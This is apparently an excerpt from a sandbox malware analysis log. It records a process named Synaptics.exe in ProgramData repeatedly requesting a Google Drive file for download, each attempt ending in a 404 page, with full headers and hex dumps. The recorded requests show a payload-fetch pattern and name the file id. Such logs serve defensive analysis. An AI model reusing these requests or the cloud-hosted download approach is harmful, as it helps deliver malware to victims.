                                                                                                              2024-12-30 10:36:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 63 68 63 68 69 39 71 4c 70 6d 75 63 75 67 7a 51 48 50 72 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="Ychchi9qLpmucugzQHPryQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              134192.168.2.449931142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:33 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QrFB2NpY8-qgzlU9Jr-Iyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              135192.168.2.449930142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4vcSrFk-P-LMPSmKHRwHzmxRA89AF0AyXwqnznfOjh8AT3Ee_HHW_jLxs981dI9kilpTgPFJo
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:34 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-07XxVIQgEImtkQ3hVF_pqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 31 37 6d 41 34 59 36 52 2d 4f 59 56 79 52 78 33 33 4a 6c 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="v17mA4Y6R-OYVyRx33JlKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              136192.168.2.449932142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CnLdXlOFapKF8CZKRl91lA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              137192.168.2.449936142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tENKwIlSvay19ZCVYTtWyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              138192.168.2.449935142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6xzXpcRTWfL75zHpV14dn1NgtAKmnqxVUzYvUOU5yaN9XdBohUKZ8MB1GAXlGpLndJc7AFJdU
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:35 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-t9wCgFSuqBUEmMNNfHKTIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 6b 77 55 30 4b 4e 46 6a 4f 65 73 77 36 68 35 61 75 46 50 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="skwU0KNFjOesw6h5auFPkg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              139192.168.2.449937142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7GjGE-49O9I31UEoaiWcLDUWizZAd9twj5mLhylU_gMbBmmK7UbVSG61ojqVU9jkop
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:35 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-q0mTk5a1OiJuqLfm70a9TA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 79 67 42 67 30 47 74 46 73 4e 6a 5f 72 79 47 38 70 46 4c 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="WygBg0GtFsNj_ryG8pFLcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              140192.168.2.449938142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:35 GMT
